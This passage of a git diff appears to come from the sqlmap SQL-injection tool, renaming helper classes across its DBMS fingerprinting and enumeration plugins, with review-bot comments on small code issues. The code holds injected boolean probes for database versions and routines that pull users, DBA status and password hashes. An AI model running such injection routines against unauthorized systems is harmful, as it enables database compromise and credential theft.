+ setDbms("%s %s" % (DBMS.MSSQL, Backend.getVersion()))
else:
setDbms(DBMS.MSSQL)
diff --git a/plugins/dbms/mysql/fingerprint.py b/plugins/dbms/mysql/fingerprint.py
index e9dc91e8f..3e3a93560 100644
--- a/plugins/dbms/mysql/fingerprint.py
+++ b/plugins/dbms/mysql/fingerprint.py
@@ -10,8 +10,8 @@ See the file 'doc/COPYING' for copying permission
import re
from lib.core.agent import agent
-from lib.core.common import backend
-from lib.core.common import format
+from lib.core.common import Backend
+from lib.core.common import Format
from lib.core.common import getUnicode
from lib.core.common import randomInt
from lib.core.data import conf
@@ -97,19 +97,19 @@ class Fingerprint(GenericFingerprint):
def getFingerprint(self):
value = ""
- wsOsFp = format.getOs("web server", kb.headersFp)
+ wsOsFp = Format.getOs("web server", kb.headersFp)
if wsOsFp:
value += "%s\n" % wsOsFp
if kb.data.banner:
- dbmsOsFp = format.getOs("back-end DBMS", kb.bannerFp)
+ dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp)
if dbmsOsFp:
value += "%s\n" % dbmsOsFp
value += "back-end DBMS: "
- actVer = format.getDbms()
+ actVer = Format.getDbms()
if not conf.extensiveFp:
value += actVer
@@ -120,7 +120,7 @@ class Fingerprint(GenericFingerprint):
value += "active fingerprint: %s" % actVer
if comVer:
- comVer = format.getDbms([comVer])
+ comVer = Format.getDbms([comVer])
value += "\n%scomment injection fingerprint: %s" % (blank, comVer)
if kb.bannerFp:
@@ -129,10 +129,10 @@ class Fingerprint(GenericFingerprint):
if re.search("-log$", kb.data.banner):
banVer += ", logging enabled"
- banVer = format.getDbms([banVer] if banVer else None)
+ banVer = Format.getDbms([banVer] if banVer else None)
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
- htmlErrorFp = format.getErrorParsedDBMSes()
+ htmlErrorFp = Format.getErrorParsedDBMSes()
if htmlErrorFp:
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
@@ -150,18 +150,18 @@ class Fingerprint(GenericFingerprint):
* http://dev.mysql.com/doc/refman/6.0/en/news-6-0-x.html (manual has been withdrawn)
"""
- if not conf.extensiveFp and (backend.isDbmsWithin(MYSQL_ALIASES) \
- or conf.dbms in MYSQL_ALIASES) and backend.getVersion() and \
- backend.getVersion() != UNKNOWN_DBMS_VERSION:
- v = backend.getVersion().replace(">", "")
+ if not conf.extensiveFp and (Backend.isDbmsWithin(MYSQL_ALIASES) \
+ or conf.dbms in MYSQL_ALIASES) and Backend.getVersion() and \
+ Backend.getVersion() != UNKNOWN_DBMS_VERSION:
+ v = Backend.getVersion().replace(">", "")
v = v.replace("=", "")
v = v.replace(" ", "")
- backend.setVersion(v)
+ Backend.setVersion(v)
- setDbms("%s %s" % (DBMS.MYSQL, backend.getVersion()))
+ setDbms("%s %s" % (DBMS.MYSQL, Backend.getVersion()))
- if backend.isVersionGreaterOrEqualThan("5"):
+ if Backend.isVersionGreaterOrEqualThan("5"):
kb.data.has_information_schema = True
self.getBanner()
@@ -190,7 +190,7 @@ class Fingerprint(GenericFingerprint):
#if inject.checkBooleanExpression("%s=(SELECT %s FROM information_schema.TABLES LIMIT 0, 1)" % (randInt, randInt)):
if inject.checkBooleanExpression("EXISTS(SELECT %s FROM information_schema.TABLES)" % randInt):
kb.data.has_information_schema = True
- backend.setVersion(">= 5.0.0")
+ Backend.setVersion(">= 5.0.0")
setDbms("%s 5" % DBMS.MYSQL)
self.getBanner()
@@ -202,43 +202,43 @@ class Fingerprint(GenericFingerprint):
# Check if it is MySQL >= 5.5.0
if inject.checkBooleanExpression("TO_SECONDS(950501)>0"):
- backend.setVersion(">= 5.5.0")
+ Backend.setVersion(">= 5.5.0")
# Check if it is MySQL >= 5.1.2 and < 5.5.0
elif inject.checkBooleanExpression("@@table_open_cache=@@table_open_cache"):
if inject.checkBooleanExpression("%s=(SELECT %s FROM information_schema.GLOBAL_STATUS LIMIT 0, 1)" % (randInt, randInt)):
- backend.setVersionList([">= 5.1.12", "< 5.5.0"])
+ Backend.setVersionList([">= 5.1.12", "< 5.5.0"])
elif inject.checkBooleanExpression("%s=(SELECT %s FROM information_schema.PROCESSLIST LIMIT 0, 1)" % (randInt,randInt)):
- backend.setVersionList([">= 5.1.7", "< 5.1.12"])
+ Backend.setVersionList([">= 5.1.7", "< 5.1.12"])
elif inject.checkBooleanExpression("%s=(SELECT %s FROM information_schema.PARTITIONS LIMIT 0, 1)" % (randInt, randInt)):
- backend.setVersion("= 5.1.6")
+ Backend.setVersion("= 5.1.6")
elif inject.checkBooleanExpression("%s=(SELECT %s FROM information_schema.PLUGINS LIMIT 0, 1)" % (randInt, randInt)):
- backend.setVersionList([">= 5.1.5", "< 5.1.6"])
+ Backend.setVersionList([">= 5.1.5", "< 5.1.6"])
else:
- backend.setVersionList([">= 5.1.2", "< 5.1.5"])
+ Backend.setVersionList([">= 5.1.2", "< 5.1.5"])
# Check if it is MySQL >= 5.0.0 and < 5.1.2
elif inject.checkBooleanExpression("@@hostname=@@hostname"):
- backend.setVersionList([">= 5.0.38", "< 5.1.2"])
+ Backend.setVersionList([">= 5.0.38", "< 5.1.2"])
elif inject.checkBooleanExpression("@@character_set_filesystem=@@character_set_filesystem"):
- backend.setVersionList([">= 5.0.19", "< 5.0.38"])
+ Backend.setVersionList([">= 5.0.19", "< 5.0.38"])
elif not inject.checkBooleanExpression("%s=(SELECT %s FROM DUAL WHERE %s!=%s)" % (randInt, randInt, randInt, randInt)):
- backend.setVersionList([">= 5.0.11", "< 5.0.19"])
+ Backend.setVersionList([">= 5.0.11", "< 5.0.19"])
elif inject.checkBooleanExpression("@@div_precision_increment=@@div_precision_increment"):
- backend.setVersionList([">= 5.0.6", "< 5.0.11"])
+ Backend.setVersionList([">= 5.0.6", "< 5.0.11"])
elif inject.checkBooleanExpression("@@automatic_sp_privileges=@@automatic_sp_privileges"):
- backend.setVersionList([">= 5.0.3", "< 5.0.6"])
+ Backend.setVersionList([">= 5.0.3", "< 5.0.6"])
else:
- backend.setVersionList([">= 5.0.0", "< 5.0.3"])
+ Backend.setVersionList([">= 5.0.0", "< 5.0.3"])
# For cases when information_schema is missing
elif inject.checkBooleanExpression("DATABASE() LIKE SCHEMA()"):
- backend.setVersion(">= 5.0.2")
+ Backend.setVersion(">= 5.0.2")
setDbms("%s 5" % DBMS.MYSQL)
self.getBanner()
elif inject.checkBooleanExpression("STRCMP(LOWER(CURRENT_USER()), UPPER(CURRENT_USER()))=0"):
- backend.setVersion("< 5.0.0")
+ Backend.setVersion("< 5.0.0")
setDbms("%s 4" % DBMS.MYSQL)
self.getBanner()
@@ -247,20 +247,20 @@ class Fingerprint(GenericFingerprint):
# Check which version of MySQL < 5.0.0 it is
if inject.checkBooleanExpression("3=(SELECT COERCIBILITY(USER()))"):
- backend.setVersionList([">= 4.1.11", "< 5.0.0"])
+ Backend.setVersionList([">= 4.1.11", "< 5.0.0"])
elif inject.checkBooleanExpression("2=(SELECT COERCIBILITY(USER()))"):
- backend.setVersionList([">= 4.1.1", "< 4.1.11"])
+ Backend.setVersionList([">= 4.1.1", "< 4.1.11"])
elif inject.checkBooleanExpression("CURRENT_USER()=CURRENT_USER()"):
- backend.setVersionList([">= 4.0.6", "< 4.1.1"])
+ Backend.setVersionList([">= 4.0.6", "< 4.1.1"])
if inject.checkBooleanExpression("'utf8'=(SELECT CHARSET(CURRENT_USER()))"):
- backend.setVersion("= 4.1.0")
+ Backend.setVersion("= 4.1.0")
else:
- backend.setVersionList([">= 4.0.6", "< 4.1.0"])
+ Backend.setVersionList([">= 4.0.6", "< 4.1.0"])
else:
- backend.setVersionList([">= 4.0.0", "< 4.0.6"])
+ Backend.setVersionList([">= 4.0.0", "< 4.0.6"])
else:
- backend.setVersion("< 4.0.0")
+ Backend.setVersion("< 4.0.0")
setDbms("%s 3" % DBMS.MYSQL)
self.getBanner()
diff --git a/plugins/dbms/oracle/enumeration.py b/plugins/dbms/oracle/enumeration.py
index 11384382a..ef109119f 100644
--- a/plugins/dbms/oracle/enumeration.py
+++ b/plugins/dbms/oracle/enumeration.py
@@ -8,7 +8,7 @@ See the file 'doc/COPYING' for copying permission
"""
from lib.core.agent import agent
-from lib.core.common import backend
+from lib.core.common import Backend
from lib.core.common import getRange
from lib.core.common import isNumPosStrValue
from lib.core.common import isTechniqueAvailable
@@ -30,7 +30,7 @@ class Enumeration(GenericEnumeration):
def getRoles(self, query2=False):
infoMsg = "fetching database users roles"
- rootQuery = queries[backend.getIdentifiedDbms()].roles
+ rootQuery = queries[Backend.getIdentifiedDbms()].roles
if conf.user == "CU":
infoMsg += " for current user"
@@ -179,7 +179,7 @@ class Enumeration(GenericEnumeration):
return []
def searchColumn(self):
- rootQuery = queries[backend.getIdentifiedDbms()].search_column
+ rootQuery = queries[Backend.getIdentifiedDbms()].search_column
foundCols = {}
dbs = { "USERS": {} }
colList = conf.col.split(",")
diff --git a/plugins/dbms/oracle/fingerprint.py b/plugins/dbms/oracle/fingerprint.py
index 724453972..c5ca94a8b 100644
--- a/plugins/dbms/oracle/fingerprint.py
+++ b/plugins/dbms/oracle/fingerprint.py
@@ -10,8 +10,8 @@ See the file 'doc/COPYING' for copying permission
import re
from lib.core.agent import agent
-from lib.core.common import backend
-from lib.core.common import format
+from lib.core.common import Backend
+from lib.core.common import Format
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
@@ -29,13 +29,13 @@ class Fingerprint(GenericFingerprint):
def getFingerprint(self):
value = ""
- wsOsFp = format.getOs("web server", kb.headersFp)
+ wsOsFp = Format.getOs("web server", kb.headersFp)
if wsOsFp:
value += "%s\n" % wsOsFp
if kb.data.banner:
- dbmsOsFp = format.getOs("back-end DBMS", kb.bannerFp)
+ dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp)
if dbmsOsFp:
value += "%s\n" % dbmsOsFp
@@ -46,16 +46,16 @@ class Fingerprint(GenericFingerprint):
value += DBMS.ORACLE
return value
- actVer = format.getDbms()
+ actVer = Format.getDbms()
blank = " " * 15
value += "active fingerprint: %s" % actVer
if kb.bannerFp:
banVer = kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None
- banVer = format.getDbms([banVer])
+ banVer = Format.getDbms([banVer])
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
- htmlErrorFp = format.getErrorParsedDBMSes()
+ htmlErrorFp = Format.getErrorParsedDBMSes()
if htmlErrorFp:
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
@@ -63,7 +63,7 @@ class Fingerprint(GenericFingerprint):
return value
def checkDbms(self):
- if not conf.extensiveFp and (backend.isDbmsWithin(ORACLE_ALIASES) or conf.dbms in ORACLE_ALIASES):
+ if not conf.extensiveFp and (Backend.isDbmsWithin(ORACLE_ALIASES) or conf.dbms in ORACLE_ALIASES):
setDbms(DBMS.ORACLE)
self.getBanner()
@@ -112,7 +112,7 @@ class Fingerprint(GenericFingerprint):
output = inject.checkBooleanExpression("%d=(SELECT SUBSTR((VERSION), 1, %d) FROM SYS.PRODUCT_COMPONENT_VERSION WHERE ROWNUM=1)" % (number, 1 if number < 10 else 2))
if output:
- backend.setVersion(version)
+ Backend.setVersion(version)
break
return True
diff --git a/plugins/dbms/postgresql/fingerprint.py b/plugins/dbms/postgresql/fingerprint.py
index 5207ec85a..29d0af462 100644
--- a/plugins/dbms/postgresql/fingerprint.py
+++ b/plugins/dbms/postgresql/fingerprint.py
@@ -10,8 +10,8 @@ See the file 'doc/COPYING' for copying permission
import re
from lib.core.agent import agent
-from lib.core.common import backend
-from lib.core.common import format
+from lib.core.common import Backend
+from lib.core.common import Format
from lib.core.common import getUnicode
from lib.core.common import randomInt
from lib.core.data import conf
@@ -32,13 +32,13 @@ class Fingerprint(GenericFingerprint):
def getFingerprint(self):
value = ""
- wsOsFp = format.getOs("web server", kb.headersFp)
+ wsOsFp = Format.getOs("web server", kb.headersFp)
if wsOsFp:
value += "%s\n" % wsOsFp
if kb.data.banner:
- dbmsOsFp = format.getOs("back-end DBMS", kb.bannerFp)
+ dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp)
if dbmsOsFp:
value += "%s\n" % dbmsOsFp
@@ -49,16 +49,16 @@ class Fingerprint(GenericFingerprint):
value += DBMS.PGSQL
return value
- actVer = format.getDbms()
+ actVer = Format.getDbms()
blank = " " * 15
value += "active fingerprint: %s" % actVer
if kb.bannerFp:
banVer = kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None
- banVer = format.getDbms([banVer])
+ banVer = Format.getDbms([banVer])
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
- htmlErrorFp = format.getErrorParsedDBMSes()
+ htmlErrorFp = Format.getErrorParsedDBMSes()
if htmlErrorFp:
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
@@ -72,7 +72,7 @@ class Fingerprint(GenericFingerprint):
* http://www.postgresql.org/docs/8.4/interactive/release.html (up to 8.4.2)
"""
- if not conf.extensiveFp and (backend.isDbmsWithin(PGSQL_ALIASES) or conf.dbms in PGSQL_ALIASES):
+ if not conf.extensiveFp and (Backend.isDbmsWithin(PGSQL_ALIASES) or conf.dbms in PGSQL_ALIASES):
setDbms(DBMS.PGSQL)
self.getBanner()
@@ -108,35 +108,35 @@ class Fingerprint(GenericFingerprint):
logger.info(infoMsg)
if inject.checkBooleanExpression("2=(SELECT DIV(6, 3))"):
- backend.setVersion(">= 8.4.0")
+ Backend.setVersion(">= 8.4.0")
elif inject.checkBooleanExpression("EXTRACT(ISODOW FROM CURRENT_TIMESTAMP)<8"):
- backend.setVersionList([">= 8.3.0", "< 8.4"])
+ Backend.setVersionList([">= 8.3.0", "< 8.4"])
elif inject.checkBooleanExpression("ISFINITE(TRANSACTION_TIMESTAMP())"):
- backend.setVersionList([">= 8.2.0", "< 8.3.0"])
+ Backend.setVersionList([">= 8.2.0", "< 8.3.0"])
elif inject.checkBooleanExpression("9=(SELECT GREATEST(5, 9, 1))"):
- backend.setVersionList([">= 8.1.0", "< 8.2.0"])
+ Backend.setVersionList([">= 8.1.0", "< 8.2.0"])
elif inject.checkBooleanExpression("3=(SELECT WIDTH_BUCKET(5.35, 0.024, 10.06, 5))"):
- backend.setVersionList([">= 8.0.0", "< 8.1.0"])
+ Backend.setVersionList([">= 8.0.0", "< 8.1.0"])
elif inject.checkBooleanExpression("'d'=(SELECT SUBSTR(MD5('sqlmap'), 1, 1))"):
- backend.setVersionList([">= 7.4.0", "< 8.0.0"])
+ Backend.setVersionList([">= 7.4.0", "< 8.0.0"])
elif inject.checkBooleanExpression("'p'=(SELECT SUBSTR(CURRENT_SCHEMA(), 1, 1))"):
- backend.setVersionList([">= 7.3.0", "< 7.4.0"])
+ Backend.setVersionList([">= 7.3.0", "< 7.4.0"])
elif inject.checkBooleanExpression("8=(SELECT BIT_LENGTH(1))"):
- backend.setVersionList([">= 7.2.0", "< 7.3.0"])
+ Backend.setVersionList([">= 7.2.0", "< 7.3.0"])
elif inject.checkBooleanExpression("'a'=(SELECT SUBSTR(QUOTE_LITERAL('a'), 2, 1))"):
- backend.setVersionList([">= 7.1.0", "< 7.2.0"])
+ Backend.setVersionList([">= 7.1.0", "< 7.2.0"])
elif inject.checkBooleanExpression("8=(SELECT POW(2, 3))"):
- backend.setVersionList([">= 7.0.0", "< 7.1.0"])
+ Backend.setVersionList([">= 7.0.0", "< 7.1.0"])
elif inject.checkBooleanExpression("'a'=(SELECT MAX('a'))"):
- backend.setVersionList([">= 6.5.0", "< 6.5.3"])
+ Backend.setVersionList([">= 6.5.0", "< 6.5.3"])
elif inject.checkBooleanExpression("VERSION()=VERSION()"):
- backend.setVersionList([">= 6.4.0", "< 6.5.0"])
+ Backend.setVersionList([">= 6.4.0", "< 6.5.0"])
elif inject.checkBooleanExpression("2=(SELECT SUBSTR(CURRENT_DATE, 1, 1))"):
- backend.setVersionList([">= 6.3.0", "< 6.4.0"])
+ Backend.setVersionList([">= 6.3.0", "< 6.4.0"])
elif inject.checkBooleanExpression("'s'=(SELECT SUBSTRING('sqlmap', 1, 1))"):
- backend.setVersionList([">= 6.2.0", "< 6.3.0"])
+ Backend.setVersionList([">= 6.2.0", "< 6.3.0"])
else:
- backend.setVersion("< 6.2.0")
+ Backend.setVersion("< 6.2.0")
return True
else:
diff --git a/plugins/dbms/sqlite/fingerprint.py b/plugins/dbms/sqlite/fingerprint.py
index 25ee5416c..ab471bcd8 100644
--- a/plugins/dbms/sqlite/fingerprint.py
+++ b/plugins/dbms/sqlite/fingerprint.py
@@ -8,8 +8,8 @@ See the file 'doc/COPYING' for copying permission
"""
from lib.core.agent import agent
-from lib.core.common import backend
-from lib.core.common import format
+from lib.core.common import Backend
+from lib.core.common import Format
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
@@ -28,13 +28,13 @@ class Fingerprint(GenericFingerprint):
def getFingerprint(self):
value = ""
- wsOsFp = format.getOs("web server", kb.headersFp)
+ wsOsFp = Format.getOs("web server", kb.headersFp)
if wsOsFp:
value += "%s\n" % wsOsFp
if kb.data.banner:
- dbmsOsFp = format.getOs("back-end DBMS", kb.bannerFp)
+ dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp)
if dbmsOsFp:
value += "%s\n" % dbmsOsFp
@@ -45,16 +45,16 @@ class Fingerprint(GenericFingerprint):
value += DBMS.SQLITE
return value
- actVer = format.getDbms()
+ actVer = Format.getDbms()
blank = " " * 15
value += "active fingerprint: %s" % actVer
if kb.bannerFp:
banVer = kb.bannerFp["dbmsVersion"]
- banVer = format.getDbms([banVer])
+ banVer = Format.getDbms([banVer])
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
- htmlErrorFp = format.getErrorParsedDBMSes()
+ htmlErrorFp = Format.getErrorParsedDBMSes()
if htmlErrorFp:
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
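Review bot: `banVer = kb.bannerFp["dbmsVersion"]` in this hunk indexes the key unconditionally, while the PostgreSQL plugin touched by the same commit reads it as `kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None`. `kb.bannerFp` appears to be derived from the banner the target returns, so a banner from which no version was parsed would presumably raise KeyError here instead of reporting a fingerprint without a version. I would use the guarded form here and in the matching getFingerprint hunk of plugins/dbms/sybase/fingerprint.py. getFingerprint starts above the hunk, so it is not visible whether an earlier check already guarantees the key.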
@@ -69,7 +69,7 @@ class Fingerprint(GenericFingerprint):
* http://www.sqlite.org/cvstrac/wiki?p=LoadableExtensions
"""
- if not conf.extensiveFp and (backend.isDbmsWithin(SQLITE_ALIASES) or conf.dbms in SQLITE_ALIASES):
+ if not conf.extensiveFp and (Backend.isDbmsWithin(SQLITE_ALIASES) or conf.dbms in SQLITE_ALIASES):
setDbms(DBMS.SQLITE)
self.getBanner()
@@ -98,7 +98,7 @@ class Fingerprint(GenericFingerprint):
result = inject.checkBooleanExpression("RANDOMBLOB(-1)>0")
version = '3' if result else '2'
- backend.setVersion(version)
+ Backend.setVersion(version)
setDbms(DBMS.SQLITE)
diff --git a/plugins/dbms/sybase/fingerprint.py b/plugins/dbms/sybase/fingerprint.py
index ef1c585ed..adcea339a 100644
--- a/plugins/dbms/sybase/fingerprint.py
+++ b/plugins/dbms/sybase/fingerprint.py
@@ -8,8 +8,8 @@ See the file 'doc/COPYING' for copying permission
"""
from lib.core.agent import agent
-from lib.core.common import backend
-from lib.core.common import format
+from lib.core.common import Backend
+from lib.core.common import Format
from lib.core.common import randomInt
from lib.core.data import conf
from lib.core.data import kb
@@ -28,13 +28,13 @@ class Fingerprint(GenericFingerprint):
def getFingerprint(self):
value = ""
- wsOsFp = format.getOs("web server", kb.headersFp)
+ wsOsFp = Format.getOs("web server", kb.headersFp)
if wsOsFp:
value += "%s\n" % wsOsFp
if kb.data.banner:
- dbmsOsFp = format.getOs("back-end DBMS", kb.bannerFp)
+ dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp)
if dbmsOsFp:
value += "%s\n" % dbmsOsFp
@@ -45,16 +45,16 @@ class Fingerprint(GenericFingerprint):
value += DBMS.SYBASE
return value
- actVer = format.getDbms()
+ actVer = Format.getDbms()
blank = " " * 15
value += "active fingerprint: %s" % actVer
if kb.bannerFp:
banVer = kb.bannerFp["dbmsVersion"]
- banVer = format.getDbms([banVer])
+ banVer = Format.getDbms([banVer])
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
- htmlErrorFp = format.getErrorParsedDBMSes()
+ htmlErrorFp = Format.getErrorParsedDBMSes()
if htmlErrorFp:
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
@@ -62,10 +62,10 @@ class Fingerprint(GenericFingerprint):
return value
def checkDbms(self):
- if not conf.extensiveFp and (backend.isDbmsWithin(SYBASE_ALIASES) \
- or conf.dbms in SYBASE_ALIASES) and backend.getVersion() and \
- backend.getVersion().isdigit():
- setDbms("%s %s" % (DBMS.SYBASE, backend.getVersion()))
+ if not conf.extensiveFp and (Backend.isDbmsWithin(SYBASE_ALIASES) \
+ or conf.dbms in SYBASE_ALIASES) and Backend.getVersion() and \
+ Backend.getVersion().isdigit():
+ setDbms("%s %s" % (DBMS.SYBASE, Backend.getVersion()))
self.getBanner()
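Review bot: The rewritten condition calls `Backend.getVersion()` three times across backslash-continued lines, which makes it hard to see that the value being tested is the one being formatted. Assuming getVersion() is a plain read, binding it once is clearer: `version = Backend.getVersion()`, then `if not conf.extensiveFp and (Backend.isDbmsWithin(SYBASE_ALIASES) or conf.dbms in SYBASE_ALIASES) and version and version.isdigit():` and `setDbms("%s %s" % (DBMS.SYBASE, version))`. checkDbms continues past the end of the hunk.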
@@ -107,7 +107,7 @@ class Fingerprint(GenericFingerprint):
result = inject.checkBooleanExpression("@@VERSION_NUMBER/1000=%d" % version)
if result:
- backend.setVersion(str(version))
+ Backend.setVersion(str(version))
break
return True
diff --git a/plugins/generic/enumeration.py b/plugins/generic/enumeration.py
index 25c08447e..687acb98c 100644
--- a/plugins/generic/enumeration.py
+++ b/plugins/generic/enumeration.py
@@ -12,13 +12,13 @@ import time
from lib.core.agent import agent
from lib.core.common import arrayizeValue
-from lib.core.common import backend
+from lib.core.common import Backend
from lib.core.common import dataToStdout
from lib.core.common import getRange
from lib.core.common import getCompiledRegex
from lib.core.common import getConsoleWidth
from lib.core.common import getFileItems
-from lib.core.common import backend
+from lib.core.common import Backend
from lib.core.common import getUnicode
from lib.core.common import isNumPosStrValue
from lib.core.common import isTechniqueAvailable
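Review bot: `from lib.core.common import Backend` now appears twice in this import block, once after `arrayizeValue` and again after `getFileItems`. The duplicate already existed under the old lowercase name, so the rename is a good moment to delete the second line. Nothing breaks at runtime, but the repeated entry makes the module's real dependencies harder to read.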
@@ -86,7 +86,7 @@ class Enumeration:
infoMsg = "fetching banner"
logger.info(infoMsg)
- query = queries[backend.getIdentifiedDbms()].banner.query
+ query = queries[Backend.getIdentifiedDbms()].banner.query
kb.data.banner = inject.getValue(query)
bannerParser(kb.data.banner)
@@ -108,7 +108,7 @@ class Enumeration:
infoMsg = "fetching current user"
logger.info(infoMsg)
- query = queries[backend.getIdentifiedDbms()].current_user.query
+ query = queries[Backend.getIdentifiedDbms()].current_user.query
if not kb.data.currentUser:
kb.data.currentUser = inject.getValue(query)
@@ -119,7 +119,7 @@ class Enumeration:
infoMsg = "fetching current database"
logger.info(infoMsg)
- query = queries[backend.getIdentifiedDbms()].current_db.query
+ query = queries[Backend.getIdentifiedDbms()].current_db.query
if not kb.data.currentDb:
kb.data.currentDb = inject.getValue(query)
@@ -130,11 +130,11 @@ class Enumeration:
infoMsg = "testing if current user is DBA"
logger.info(infoMsg)
- if backend.getIdentifiedDbms() == DBMS.MYSQL:
+ if Backend.getIdentifiedDbms() == DBMS.MYSQL:
self.getCurrentUser()
- query = queries[backend.getIdentifiedDbms()].is_dba.query % kb.data.currentUser.split("@")[0]
+ query = queries[Backend.getIdentifiedDbms()].is_dba.query % kb.data.currentUser.split("@")[0]
else:
- query = queries[backend.getIdentifiedDbms()].is_dba.query
+ query = queries[Backend.getIdentifiedDbms()].is_dba.query
query = agent.forgeCaseStatement(query)
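Review bot: `kb.data.currentUser.split("@")[0]` on the MySQL branch assumes that getCurrentUser() left a string in `kb.data.currentUser`. That value is whatever `inject.getValue(query)` returned for data supplied by the remote DBMS; if retrieval fails and yields None (not visible here, though other callers in this file test the result before using it), the line ends in an AttributeError rather than a readable error. A guard before building the query, such as `if not kb.data.currentUser: raise sqlmapNoneDataException, "unable to retrieve the current user"`, would keep the failure explicit. The method starts and ends outside the hunk.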
@@ -146,10 +146,10 @@ class Enumeration:
infoMsg = "fetching database users"
logger.info(infoMsg)
- rootQuery = queries[backend.getIdentifiedDbms()].users
+ rootQuery = queries[Backend.getIdentifiedDbms()].users
- condition = ( backend.getIdentifiedDbms() == DBMS.MSSQL and backend.isVersionWithin(("2005", "2008")) )
- condition |= ( backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema )
+ condition = ( Backend.getIdentifiedDbms() == DBMS.MSSQL and Backend.isVersionWithin(("2005", "2008")) )
+ condition |= ( Backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema )
if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) or isTechniqueAvailable(PAYLOAD.TECHNIQUE.ERROR) or conf.direct:
if condition:
@@ -175,14 +175,14 @@ class Enumeration:
errMsg = "unable to retrieve the number of database users"
raise sqlmapNoneDataException, errMsg
- if backend.getIdentifiedDbms() == DBMS.ORACLE:
+ if Backend.getIdentifiedDbms() == DBMS.ORACLE:
plusOne = True
else:
plusOne = False
indexRange = getRange(count, plusOne=plusOne)
for index in indexRange:
- if backend.getIdentifiedDbms() in (DBMS.SYBASE, DBMS.MAXDB):
+ if Backend.getIdentifiedDbms() in (DBMS.SYBASE, DBMS.MAXDB):
query = rootQuery.blind.query % (kb.data.cachedUsers[-1] if kb.data.cachedUsers else " ")
elif condition:
query = rootQuery.blind.query2 % index
@@ -202,7 +202,7 @@ class Enumeration:
def getPasswordHashes(self):
infoMsg = "fetching database users password hashes"
- rootQuery = queries[backend.getIdentifiedDbms()].passwords
+ rootQuery = queries[Backend.getIdentifiedDbms()].passwords
if conf.user == "CU":
infoMsg += " for current user"
@@ -211,7 +211,7 @@ class Enumeration:
logger.info(infoMsg)
if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) or isTechniqueAvailable(PAYLOAD.TECHNIQUE.ERROR) or conf.direct:
- if backend.getIdentifiedDbms() == DBMS.MSSQL and backend.isVersionWithin(("2005", "2008")):
+ if Backend.getIdentifiedDbms() == DBMS.MSSQL and Backend.isVersionWithin(("2005", "2008")):
query = rootQuery.inband.query2
else:
query = rootQuery.inband.query
@@ -224,7 +224,7 @@ class Enumeration:
query += " WHERE "
query += " OR ".join("%s = '%s'" % (condition, user) for user in users)
else:
- if backend.getIdentifiedDbms() == DBMS.MYSQL:
+ if Backend.getIdentifiedDbms() == DBMS.MYSQL:
parsedUser = re.search("[\047]*(.*?)[\047]*\@", conf.user)
if parsedUser:
@@ -261,7 +261,7 @@ class Enumeration:
retrievedUsers = set()
for user in users:
- if backend.getIdentifiedDbms() == DBMS.MYSQL:
+ if Backend.getIdentifiedDbms() == DBMS.MYSQL:
parsedUser = re.search("[\047]*(.*?)[\047]*\@", user)
if parsedUser:
@@ -274,7 +274,7 @@ class Enumeration:
infoMsg += "for user '%s'" % user
logger.info(infoMsg)
- if backend.getIdentifiedDbms() == DBMS.MSSQL and backend.isVersionWithin(("2005", "2008")):
+ if Backend.getIdentifiedDbms() == DBMS.MSSQL and Backend.isVersionWithin(("2005", "2008")):
query = rootQuery.blind.count2 % user
else:
query = rootQuery.blind.count % user
@@ -291,14 +291,14 @@ class Enumeration:
passwords = []
- if backend.getIdentifiedDbms() == DBMS.ORACLE:
+ if Backend.getIdentifiedDbms() == DBMS.ORACLE:
plusOne = True
else:
plusOne = False
indexRange = getRange(count, plusOne=plusOne)
for index in indexRange:
- if backend.getIdentifiedDbms() == DBMS.SYBASE:
+ if Backend.getIdentifiedDbms() == DBMS.SYBASE:
if index > 0:
warnMsg = "unable to retrieve other password "
warnMsg += "hashes for user '%s'" % user
@@ -307,15 +307,15 @@ class Enumeration:
else:
query = rootQuery.blind.query % user
getCurrentThreadData().disableStdOut = True
- elif backend.getIdentifiedDbms() == DBMS.MSSQL:
- if backend.isVersionWithin(("2005", "2008")):
+ elif Backend.getIdentifiedDbms() == DBMS.MSSQL:
+ if Backend.isVersionWithin(("2005", "2008")):
query = rootQuery.blind.query2 % (user, index, user)
else:
query = rootQuery.blind.query % (user, index, user)
else:
query = rootQuery.blind.query % (user, index)
password = inject.getValue(query, inband=False, error=False)
- if backend.getIdentifiedDbms() == DBMS.SYBASE:
+ if Backend.getIdentifiedDbms() == DBMS.SYBASE:
getCurrentThreadData().disableStdOut = False
password = "0x%s" % strToHex(password)
infoMsg = "retrieved: %s" % password
@@ -352,31 +352,31 @@ class Enumeration:
def __isAdminFromPrivileges(self, privileges):
# In PostgreSQL the usesuper privilege means that the
# user is DBA
- dbaCondition = ( backend.getIdentifiedDbms() == DBMS.PGSQL and "super" in privileges )
+ dbaCondition = ( Backend.getIdentifiedDbms() == DBMS.PGSQL and "super" in privileges )
# In Oracle the DBA privilege means that the
# user is DBA
- dbaCondition |= ( backend.getIdentifiedDbms() == DBMS.ORACLE and "DBA" in privileges )
+ dbaCondition |= ( Backend.getIdentifiedDbms() == DBMS.ORACLE and "DBA" in privileges )
# In MySQL >= 5.0 the SUPER privilege means
# that the user is DBA
